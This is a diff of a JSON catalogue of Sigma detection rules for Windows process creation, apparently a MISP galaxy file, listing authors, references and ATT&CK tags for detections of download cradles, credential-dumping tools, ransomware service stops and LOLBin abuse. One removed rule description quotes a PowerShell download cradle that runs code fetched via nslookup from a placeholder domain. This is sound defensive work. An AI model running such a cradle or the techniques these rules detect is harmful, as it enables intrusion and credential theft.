"value": "Nslookup PowerShell Download" + "uuid": "9f06447a-a33a-4cbe-a94f-a3f43184a7a3", + "value": "Rundll32 JS RunHTMLApplication Pattern" }, { - "description": "This rule tries to detect powershell download cradles, e.g. powershell . (nslookup -q=txt http://some.owned.domain.com)[-1]", + "description": "Detects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them without touching disk. The manifest option enables you to install an application by passing in a YAML file directly to the client. Winget can be used to download and install exe's, msi, msix files later.", "meta": { - "author": "Zach Mathis (@yamatosecurity)", - "creation_date": "2022/09/06", - "falsepositive": "No established falsepositives", - "filename": "proc_creation_win_nslookup_pwsh_download_cradle.yml", + "author": "Sreeman, Florian Roth, Frack113", + "creation_date": "2020/04/21", + "falsepositive": [ + "Admin activity installing packages not in the official Microsoft repo. Winget probably won't be used by most users." + ], + "filename": "proc_creation_win_lolbin_execution_via_winget.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/alh4zr3d/status/1566489367232651264", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml" + "https://docs.microsoft.com/en-us/windows/package-manager/winget/install#local-install", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_execution_via_winget.yml" ], "tags": [ - "attack.command_and_control", - "attack.t1105", - "attack.t1071.004" + "attack.defense_evasion", + "attack.execution", + "attack.t1059" ] }, - "uuid": "72671447-4352-4413-bb91-b85569687135", - "value": "Nslookup PwSh Download Cradle" + "uuid": "313d6012-51a0-4d93-8dfc-de8553239e25", + "value": "Monitoring Winget For LOLbin Execution" }, { - "description": "Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)", + "description": "Detects the use of KrbRelay, a Kerberos relaying tool", "meta": { - "author": "Thomas Patzke", - "creation_date": "2019/01/16", + "author": "Florian Roth", + "creation_date": "2022/04/27", "falsepositive": [ - "NTDS maintenance" + "Unlikely" ], - "filename": "proc_creation_win_ntdsutil_usage.yml", + "filename": "proc_creation_win_hack_krbrelay.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/cube0x0/KrbRelay", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_krbrelay.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1558.003" + ] + }, + "uuid": "e96253b8-6b3b-4f90-9e59-3b24b99cf9b4", + "value": "KrbRelay Hack Tool" + }, + { + "description": "Detects execution of msdt.exe using the \"cab\" flag which could indicates suspicious diagcab files with embedded answer files leveraging CVE-2022-30190", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/21", + "falsepositive": [ + "Legitimate usage of \".diagcab\" files" + ], + "filename": "proc_creation_win_msdt_susp_cab_options.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/ntdsutil.htm", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntdsutil_usage.yml" + "https://twitter.com/nas_bench/status/1537896324837781506", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_susp_cab_options.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ] + }, + "uuid": "dc4576d4-7467-424f-9eee-fd2b02855fe0", + "value": "MSDT.EXE Execution With Suspicious Cab Option" + }, + { + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "meta": { + "author": "Florian Roth, Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2017/11/10", + "falsepositive": "No established falsepositives", + "filename": "proc_creation_win_mal_adwind.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", + "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_adwind.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" + ] + }, + "uuid": "1fac1481-2dbc-48b2-9096-753c49b4ec71", + "value": "Adwind RAT / JRAT" + }, + { + "description": "Detects the use of Windows Credential Editor (WCE)", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/12/31", + "falsepositive": [ + "Another service that uses a single -s command line switch" + ], + "filename": "proc_creation_win_hack_wce.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.ampliasecurity.com/research/windows-credentials-editor/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_wce.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0005" + ] + }, + "uuid": "7aa7009a-28b9-4344-8c1f-159489a390df", + "value": "Windows Credential Editor" + }, + { + "description": "Detects the use of Ditsnap tool. Seems to be a tool for ransomware groups.", + "meta": { + "author": "Furkan Caliskan (@caliskanfurkan_)", + "creation_date": "2020/07/04", + "falsepositive": [ + "Legitimate admin usage" + ], + "filename": "proc_creation_win_susp_ditsnap.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/yosqueoy/ditsnap", + "https://thedfirreport.com/2020/06/21/snatch-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ditsnap.yml" ], "tags": [ "attack.credential_access", "attack.t1003.003" ] }, - "uuid": "2afafd61-6aae-4df4-baed-139fa1f4c345", - "value": "Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)" + "uuid": "d3b70aad-097e-409c-9df2-450f80dc476b", + "value": "DIT Snapshot Viewer Use" }, { - "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection", - "meta": { - "author": "frack113, Nasreddine Bencherchali", - "creation_date": "2022/08/07", - "falsepositive": [ - "Applications could use this notation occasionally which might generate some false positives. In that case investigate the parent and child process." - ], - "filename": "proc_creation_win_ntfs_short_name_path_use_cli.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", - "https://twitter.com/frack113/status/1555830623633375232", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.004" - ] - }, - "uuid": "349d891d-fef0-4fe4-bc53-eee623a15969", - "value": "Use Short Name Path in Command Line" - }, - { - "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image detection", - "meta": { - "author": "frack113, Nasreddine Bencherchali", - "creation_date": "2022/08/07", - "falsepositive": [ - "Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process." - ], - "filename": "proc_creation_win_ntfs_short_name_path_use_image.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", - "https://twitter.com/frack113/status/1555830623633375232", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_image.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.004" - ] - }, - "uuid": "a96970af-f126-420d-90e1-d37bf25e50e1", - "value": "Use Short Name Path in Image" - }, - { - "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection", - "meta": { - "author": "frack113, Nasreddine Bencherchali", - "creation_date": "2022/08/05", - "falsepositive": [ - "Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process." - ], - "filename": "proc_creation_win_ntfs_short_name_use_cli.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", - "https://twitter.com/jonasLyk/status/1555914501802921984", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_cli.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.004" - ] - }, - "uuid": "dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795", - "value": "Use NTFS Short Name in Command Line" - }, - { - "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection", - "meta": { - "author": "frack113, Nasreddine Bencherchali", - "creation_date": "2022/08/06", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_ntfs_short_name_use_image.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", - "https://twitter.com/jonasLyk/status/1555914501802921984", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_image.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.004" - ] - }, - "uuid": "3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b", - "value": "Use NTFS Short Name in Image" - }, - { - "description": "Detects use of an encoded/obfuscated version of an IP address (hex, octal...) in an URL combined with a download command", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/08/03", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_obfuscated_ip_download.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://h.43z.one/ipconverter/", - "https://twitter.com/Yasser_Elsnbary/status/1553804135354564608", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_obfuscated_ip_download.yml" - ], - "tags": [ - "attack.discovery" - ] - }, - "uuid": "cb5a2333-56cf-4562-8fcb-22ba1bca728d", - "value": "Obfuscated IP Download" - }, - { - "description": "Detects usage of an encoded/obfuscated version of an IP address (hex, octal...) via commandline", + "description": "Detects wmic known recon method to look for installed hotfixes, often used by pentest and attackers enum scripts", "meta": { "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/03", + "creation_date": "2022/06/20", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_obfuscated_ip_via_cli.yml", + "filename": "proc_creation_win_wmic_hotfix_enum.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://h.43z.one/ipconverter/", - "https://twitter.com/Yasser_Elsnbary/status/1553804135354564608", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_obfuscated_ip_via_cli.yml" + "https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html", + "https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_hotfix_enum.yml" ], "tags": [ - "attack.discovery" - ] - }, - "uuid": "56d19cb4-6414-4769-9644-1ed35ffbb148", - "value": "Obfuscated IP Via CLI" - }, - { - "description": "Initial execution of malicious document calls wmic to execute the file with regsvr32", - "meta": { - "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", - "creation_date": "2021/08/23", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_office_applications_spawning_wmi_commandline.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", - "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_applications_spawning_wmi_commandline.yml" - ], - "tags": [ - "attack.t1204.002", - "attack.t1047", - "attack.t1218.010", "attack.execution", - "attack.defense_evasion" + "attack.t1047" ] }, - "uuid": "518643ba-7d9c-4fa5-9f37-baed36059f6a", - "value": "Office Applications Spawning Wmi Cli" + "uuid": "dfd2fcb7-8bd5-4daa-b132-5adb61d6ad45", + "value": "WMIC Hotfix Recon" }, { - "description": "Detects Office Applications executing a Windows child process including directory traversal patterns", + "description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system", "meta": { - "author": "@SBousseaden (idea), Christian Burkard (rule)", - "creation_date": "2022/06/02", + "author": "frack113", + "creation_date": "2022/03/12", "falsepositive": [ - "Unknown" + "Legitimate script" ], - "filename": "proc_creation_win_office_dir_traversal_cli.yml", + "filename": "proc_creation_win_network_scan_loop.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://ss64.com/ps/foreach-object.htmll", + "https://ss64.com/nt/for.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_network_scan_loop.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059", + "attack.discovery", + "attack.t1018" + ] + }, + "uuid": "f8ad2e2c-40b6-4117-84d7-20b89896ab23", + "value": "Suspicious Scan Loop Network" + }, + { + "description": "Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/11", + "falsepositive": [ + "Legitimate tools that accidentally match on the searched patterns" + ], + "filename": "proc_creation_win_susp_progname.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/sbousseaden/status/1531653369546301440", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_dir_traversal_cli.yml" + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_progname.yml" + ], + "tags": "No established tags" + }, + "uuid": "efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6", + "value": "Suspicious Program Names" + }, + { + "description": "Detects the usage of one of the the commands to stop services such as 'net', 'sc'...etc in order to stop critical or important windows services such as AV, Backup...etc. As seen being used in some ransomware scripts", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/01", + "falsepositive": [ + "Administrator or tools shutting down the services due to upgrade or removal purposes. If you experience some FP please consider adding filters to the parent process launching this command and not removing the entry" + ], + "filename": "proc_creation_win_susp_service_stop.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus/Genshin%20Impact%20Figure%2010.jpg", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_stop.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1489" + ] + }, + "uuid": "ce72ef99-22f1-43d4-8695-419dcb5d9330", + "value": "Suspicious Stop Windows Service" + }, + { + "description": "Detects a base64 encoded FromBase64String keyword in a process command line", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/08/24", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_encoded_frombase64string.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_encoded_frombase64string.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c", + "value": "Encoded FromBase64String" + }, + { + "description": "Detect use of TruffleSnout.exe", + "meta": { + "author": "frack113", + "creation_date": "2022/08/20", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_trufflesnout.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/dsnezhkov/TruffleSnout", + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_trufflesnout.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1482" + ] + }, + "uuid": "69ca006d-b9a9-47f5-80ff-ecd4d25d481a", + "value": "Launch TruffleSnout Executable" + }, + { + "description": "Detects execution of wmic utility with the \"computersystem\" flag in order to obtain information about the machine such as the domain, username, model...etc.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_wmic_computersystem_recon.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_computersystem_recon.yml" + ], + "tags": [ + "attack.discovery", + "attack.execution", + "attack.t1047" + ] + }, + "uuid": "9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f", + "value": "Suspicious Get ComputerSystem Information with WMIC" + }, + { + "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", + "meta": { + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "creation_date": "2020/10/06", + "falsepositive": [ + "Legitimate usage by software developers/testers" + ], + "filename": "proc_creation_win_lolbin_tttracer_mod_load.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/oulusoyum/status/1191329746069655553", + "https://twitter.com/mattifestation/status/1196390321783025666", + "https://lolbas-project.github.io/lolbas/Binaries/Tttracer/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.credential_access", + "attack.t1218", + "attack.t1003.001" + ] + }, + "uuid": "0b4ae027-2a2d-4b93-8c7e-962caaba5b2a", + "value": "Time Travel Debugging Utility Usage" + }, + { + "description": "One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe", + "meta": { + "author": "frack113", + "creation_date": "2022/02/13", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_esentutl_webcache.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/threat-detection-report/threats/qbot/", + "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/", + "https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml" + ], + "tags": [ + "attack.collection", + "attack.t1005" + ] + }, + "uuid": "6a69f62d-ce75-4b57-8dce-6351eb55b362", + "value": "Esentutl Steals Browser Information" + }, + { + "description": "Attackers can use findstr to hide their artifacts or search specific strings and evade defense mechanism", + "meta": { + "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali", + "creation_date": "2020/10/05", + "falsepositive": [ + "Administrative findstr usage" + ], + "filename": "proc_creation_win_lolbin_findstr.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Findstr/", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_findstr.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.t1564.004", + "attack.t1552.001", + "attack.t1105" + ] + }, + "uuid": "bf6c39fc-e203-45b9-9538-05397c1b4f3f", + "value": "Abusing Findstr for Defense Evasion" + }, + { + "description": "Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/11/29", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_powertool_execution.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html", + "https://twitter.com/gbti_sa/status/1249653895900602375?lang=en", + "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", + "https://www.softpedia.com/get/Antivirus/Removal-Tools/ithurricane-PowerTool.shtml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powertool_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "a34f79a3-8e5f-4cc3-b765-de00695452c2", + "value": "PowerTool Execution" + }, + { + "description": "Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module", + "meta": { + "author": "Bartlomiej Czyz, Relativity", + "creation_date": "2021/01/31", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_rundll32_without_parameters.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://bczyz1.github.io/2021/01/30/psexec.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_without_parameters.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1570", + "attack.execution", + "attack.t1569.002" + ] + }, + "uuid": "5bb68627-3198-40ca-b458-49f973db8752", + "value": "Rundll32 Without Parameters" + }, + { + "description": "Detects Possible usage of Windows Subsystem for Linux (WSL) binary as a LOLBIN", + "meta": { + "author": "oscd.community, Zach Stanford @svch0st, Nasreddine Bencherchali", + "creation_date": "2020/10/05", + "falsepositive": [ + "Automation and orchestration scripts may use this method execute scripts etc", + "Legitimate use by Windows to kill processes opened via WSL (example VsCode WSL server)" + ], + "filename": "proc_creation_win_lolbin_susp_wsl.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/", + "https://twitter.com/nas_bench/status/1535431474429808642", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_wsl.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" + ] + }, + "uuid": "dec44ca7-61ad-493c-bfd7-8819c5faa09b", + "value": "WSL Execution" + }, + { + "description": "Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors", + "meta": { + "author": "Florian Roth (rule), Microsoft (idea)", + "creation_date": "2022/08/04", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_susp_iis_module_registration.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_iis_module_registration.yml" + ], + "tags": "No established tags" + }, + "uuid": "043c4b8b-3a54-4780-9682-081cb6b8185c", + "value": "Suspicious IIS Module Registration" + }, + { + "description": "Adversaries may interact with the Windows Registry to gather information about credentials, the system, configuration, and installed software.", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2019/10/21", + "falsepositive": "No established falsepositives", + "filename": "proc_creation_win_query_registry.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1012/T1012.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_query_registry.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1012", + "attack.t1007" + ] + }, + "uuid": "970007b7-ce32-49d0-a4a4-fbef016950bd", + "value": "Query Registry" + }, + { + "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", + "meta": { + "author": "frack113", + "creation_date": "2021/07/27", + "falsepositive": [ + "Command line parameter combinations that contain all included strings" + ], + "filename": "proc_creation_win_susp_7z.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_7z.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560.001" + ] + }, + "uuid": "9fbf5927-5261-4284-a71d-f681029ea574", + "value": "Compress Data and Lock With Password for Exfiltration With 7-ZIP" + }, + { + "description": "Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/10", + "falsepositive": [ + "Other parent processes other than notepad++ using GUP that are not currently identified" + ], + "filename": "proc_creation_win_susp_gup_download.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/nas_bench/status/1535322182863179776", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_gup_download.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "44143844-0631-49ab-97a0-96387d6b2d7c", + "value": "Download Files Using Notepad++ GUP Utility" + }, + { + "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", + "meta": { + "author": "frack113", + "creation_date": "2022/12/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_powershell_token_obfuscation.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/danielbohannon/Invoke-Obfuscation", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_token_obfuscation.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.009" + ] + }, + "uuid": "deb9b646-a508-44ee-b7c9-d8965921c6b6", + "value": "Powershell Token Obfuscation - Process Creation" + }, + { + "description": "Detects svchost process spawning an instance of an office application. This happens when the initial word application create an instance of one of the office COM objects such as 'Word.Application', 'Excel.Application'...etc. This can be used by malicious actor to create a malicious office document with macros on the fly. (See vba2clr project in reference)", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/13", + "falsepositive": [ + "Legitimate usage of office automation via scripting" + ], + "filename": "proc_creation_win_office_svchost_child.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://learn.microsoft.com/en-us/previous-versions/office/troubleshoot/office-developer/automate-word-create-file-using-visual-basic", + "https://github.com/med0x2e/vba2clr", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_svchost_child.yml" ], "tags": [ "attack.execution", "attack.defense_evasion" ] }, - "uuid": "868955d9-697e-45d4-a3da-360cefd7c216", - "value": "Office Directory Traversal CommandLine" + "uuid": "9bdaf1e9-fdef-443b-8081-4341b74a7e28", + "value": "Svchost Spawning Office Application" + }, + { + "description": "Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.", + "meta": { + "author": "Nasreddine Bencherchali @nas_bench", + "creation_date": "2021/12/18", + "falsepositive": [ + "Legitimate administrative use (Should be investigated either way)" + ], + "filename": "proc_creation_win_cleanwipe.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/CleanWipe", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cleanwipe.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "f44800ac-38ec-471f-936e-3fa7d9c53100", + "value": "CleanWipe Usage" + }, + { + "description": "The Devtoolslauncher.exe executes other binary", + "meta": { + "author": "Beyu Denis, oscd.community (rule), @_felamos (idea)", + "creation_date": "2019/10/12", + "falsepositive": [ + "Legitimate use of devtoolslauncher.exe by legitimate user" + ], + "filename": "proc_creation_win_susp_devtoolslauncher.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devtoolslauncher/", + "https://twitter.com/_felamos/status/1179811992841797632", + 